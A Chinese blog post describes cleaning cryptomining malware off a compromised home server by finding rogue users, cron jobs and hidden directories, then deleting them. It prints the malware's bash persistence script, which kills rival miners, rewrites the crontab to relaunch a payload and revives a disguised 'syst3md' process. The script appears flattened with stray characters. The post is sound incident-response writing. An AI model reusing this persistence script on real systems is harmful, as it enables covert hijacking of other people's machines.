记一次服务器被攻破排查，清理入侵程序

说真的，没有想过家庭整的一个服务器会被攻破的，之前那个用户是啥权限的都没有的，没想要尽让让人给我破解进来，搞了一堆挖矿的程序

目前已经清理干净，所以贴的是遗留下来的截图

 

 下面开始清理恶意程序的路线

恶意程序没法简单清理，所以需要找到源头，首先我断开了端口映射，取消该服务器连接外网的功能

 

 

使用top命令看到了两个很异常的用户，tutu和gdm，因为这两个用户我都是不用的

 

 想要删除2这两个用户，目前是删不掉的，所以看看是不是有什么定时任务

切换到tutu用户看到

 三个定时任务，难怪怎么也杀不掉

 使用root账号

sudo find / -name ".*" -type d

 删除

rm -rf /tmp/.ICE-unix

 

删除用户

最后看下现在的情况

 再给一些恶意代码的分析

?

1 2 3 4 5 6 7

#!/bin/bash  sleeptime=5  killminers() {     pkill obama1     pkill playstation     pkill xmrig ?pkill java     pkill cnrig }  hook1location=`cat /var/tmp/.apachee/.hook1location` apachelogslocation=`cat /var/tmp/.apachee/.apachelogslocation`  while : do ?killminers  ?if ! crontab -l | grep -q 'cronstart'; ?then ? ?rm -rf .tempo ??echo "* * * * * ${hook1location} > /dev/null <&1 2>&1 & disown" >> .tempo ??sleep 1 ??echo "@monthly ${hook1location} > /dev/null <&1 2>&1 &  disown" >> .tempo ??sleep 1 ??echo "@reboot ${apachelogslocation} > /dev/null <&1 2>&1 & disown" >> .tempo ??crontab .tempo ??rm -rf .tempo ?fi ? ?if !  pgrep -x syst3md > /dev/null ?then ??$hook1location > /dev/null <&1 2>&1 &  disown ?fi  ?sleep $sleeptime done  ./apachelogs

　　

对于恶意用户可以先进行锁定

sudo passwd -l tutu
找到和用户关联的进程

ps -u tutu
删除用户

sudo userdel -r tutu
因为涉及了gdm用户，所以使用了如下的命令
停止了gdm服务

sudo systemctl stop gdm
删除gdm用户

sudo userdel -r gdm